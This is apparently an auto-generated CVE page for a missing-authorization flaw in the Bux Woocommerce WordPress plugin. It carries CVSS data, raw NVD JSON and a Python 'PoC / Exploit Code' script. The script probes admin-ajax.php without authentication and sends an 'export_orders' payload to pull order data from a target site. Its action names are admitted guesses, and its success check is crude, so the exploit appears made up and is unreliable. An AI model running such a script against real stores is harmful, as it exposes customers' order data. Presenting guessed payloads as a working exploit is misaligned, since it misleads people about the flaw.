Security Vulnerability Report
中文
CVE-2025-60247 CVSS 6.5 MEDIUM

CVE-2025-60247

Published: 2025-11-06 16:16:08
Last Modified: 2026-04-27 16:16:34

Description

Missing Authorization vulnerability in Bux Bux Woocommerce bux-woocommerce allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Bux Woocommerce: from n/a through <= 1.2.3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

bux-woocommerce <= 1.2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60247 PoC - Bux Woocommerce Authorization Bypass # Affected: bux-woocommerce <= 1.2.3 import requests import sys TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """Check if target is vulnerable to CVE-2025-60247""" # Test 1: Unauthenticated AJAX endpoint access ajax_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/bux-woocommerce/v1/" ] vulnerable_endpoints = [] for endpoint in ajax_endpoints: url = f"{TARGET_URL}{endpoint}" # Test common vulnerable actions test_data = { "action": "bux_get_orders", # Example vulnerable action "post_id": "1" } try: response = requests.post(url, data=test_data, timeout=10) # Check if response indicates successful unauthorized access if response.status_code == 200 and "error" not in response.text.lower(): vulnerable_endpoints.append({ "endpoint": endpoint, "status_code": response.status_code, "response_preview": response.text[:200] }) except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") if vulnerable_endpoints: print("[+] VULNERABLE - Authorization bypass detected!") for vuln in vulnerable_endpoints: print(f" Endpoint: {vuln['endpoint']}") print(f" Status: {vuln['status_code']}") else: print("[-] Target appears to be patched or not using affected plugin") return len(vulnerable_endpoints) > 0 def exploit_authorization_bypass(): """Attempt to exploit the authorization bypass vulnerability""" print("\n[*] Attempting to exploit authorization bypass...") # Construct malicious request to access protected functionality exploit_payload = { "action": "bux_admin_action", "subaction": "export_orders", "format": "json" } url = f"{TARGET_URL}/wp-admin/admin-ajax.php" try: response = requests.post(url, data=exploit_payload, timeout=10) if response.status_code == 200: print(f"[+] Exploit sent successfully") print(f"[+] Response: {response.text[:500]}") except requests.RequestException as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": print("=" * 60) print("CVE-2025-60247 - Bux Woocommerce Authorization Bypass Checker") print("=" * 60) if len(sys.argv) > 1: TARGET_URL = sys.argv[1] print(f"\n[*] Target: {TARGET_URL}") is_vulnerable = check_vulnerability() if is_vulnerable: exploit_authorization_bypass() print("\n[*] Scan complete")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60247", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:07.520", "lastModified": "2026-04-27T16:16:34.333", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Bux Bux Woocommerce bux-woocommerce allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Bux Woocommerce: from n/a through <= 1.2.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/bux-woocommerce/vulnerability/wordpress-bux-woocommerce-plugin-1-2-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}